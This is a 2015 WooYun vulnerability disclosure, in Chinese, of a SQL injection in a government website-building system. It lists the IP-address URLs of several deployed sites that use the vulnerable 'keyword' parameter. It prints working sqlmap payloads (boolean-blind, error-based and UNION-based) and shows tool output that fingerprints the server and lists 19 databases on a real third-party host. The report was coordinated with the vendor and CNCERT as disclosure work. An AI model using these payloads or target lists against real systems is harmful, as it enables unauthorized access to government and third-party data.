当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103548

漏洞标题:某通用型政府建站系统SQL注入

相关厂商:山东农友软件

漏洞作者: 路人甲

提交时间:2015-03-25 18:23

修复时间:2015-06-25 16:38

公开时间:2015-06-25 16:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-25: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-03-30: 细节向第三方安全合作伙伴开放
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

RT

详细说明:

山东农友软件公司官网:http://www.nongyou.com.cn/
案例如下:
http://222.135.127.190:7000/gov/SearchInfoSum.aspx?keyword=
http://221.2.171.59:8000/gov/SearchInfoSum.aspx?keyword=
http://222.135.109.70:8100/gov/SearchInfoSum.aspx?keyword=
http://61.133.119.187:8089/gov/SearchInfoSum.aspx?keyword=
http://221.2.156.181:8100//gov/SearchInfoSum.aspx?keyword=
http://221.2.149.47:8100/gov/SearchInfoSum.aspx?keyword=
http://222.135.127.190:7000/gov/SearchInfoSum.aspx?keyword=

漏洞证明:

参数keyword存在注入
测试:http://huodong.whinfo.net.cn/gov/SearchInfoSum.aspx?keyword=

Place: GET
Parameter: keyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=%' AND 3437=3437 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: keyword=%' AND 2049=CONVERT(INT,(CHAR(58) CHAR(113) CHAR(104) CHAR(
110) CHAR(58) (SELECT (CASE WHEN (2049=2049) THEN CHAR(49) ELSE CHAR(48) END)) C
HAR(58) CHAR(106) CHAR(97) CHAR(122) CHAR(58))) AND '%'='
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: keyword=%' UNION ALL SELECT CHAR(58) CHAR(113) CHAR(104) CHAR(110)
CHAR(58) CHAR(85) CHAR(110) CHAR(70) CHAR(81) CHAR(118) CHAR(84) CHAR(113) CHAR(
84) CHAR(120) CHAR(69) CHAR(58) CHAR(106) CHAR(97) CHAR(122) CHAR(58),NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[21:40:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[21:40:08] [INFO] fetching database names
[21:40:09] [INFO] the SQL query used returns 19 entries
[21:40:14] [INFO] retrieved: "3g_shop"
[21:40:15] [INFO] retrieved: "allMessage"
[21:40:20] [INFO] retrieved: "club_model"
[21:40:22] [INFO] retrieved: "eweb_gov"
[21:40:32] [INFO] retrieved: "eweb_serve"
[21:40:33] [INFO] retrieved: "eweb_sun"
[21:40:41] [INFO] retrieved: "kehuSns"
[21:40:45] [INFO] retrieved: "master"
[21:40:46] [INFO] retrieved: "model"
[21:40:52] [INFO] retrieved: "msdb"
[21:40:53] [INFO] retrieved: "NetSNS"
[21:40:57] [INFO] retrieved: "tempdb"
[21:41:05] [INFO] retrieved: "web800"
[21:41:06] [INFO] retrieved: "wh2_caijing"
[21:41:08] [INFO] retrieved: "wh2_favlife"
[21:41:09] [INFO] retrieved: "wh2_housenew"
[21:41:13] [INFO] retrieved: "wh2_search"
[21:41:14] [INFO] retrieved: "wh2_tbSMS"
[21:41:15] [INFO] retrieved: "whinfo_chat"
available databases [19]:
[*] 3g_shop
[*] allMessage
[*] club_model
[*] eweb_gov
[*] eweb_serve
[*] eweb_sun
[*] kehuSns
[*] master
[*] model
[*] msdb
[*] NetSNS
[*] tempdb
[*] web800
[*] wh2_caijing
[*] wh2_favlife
[*] wh2_housenew
[*] wh2_search
[*] wh2_tbSMS
[*] whinfo_chat


修复方案:

RT

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-27 16:37

厂商回复:

已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报

最新状态:

暂无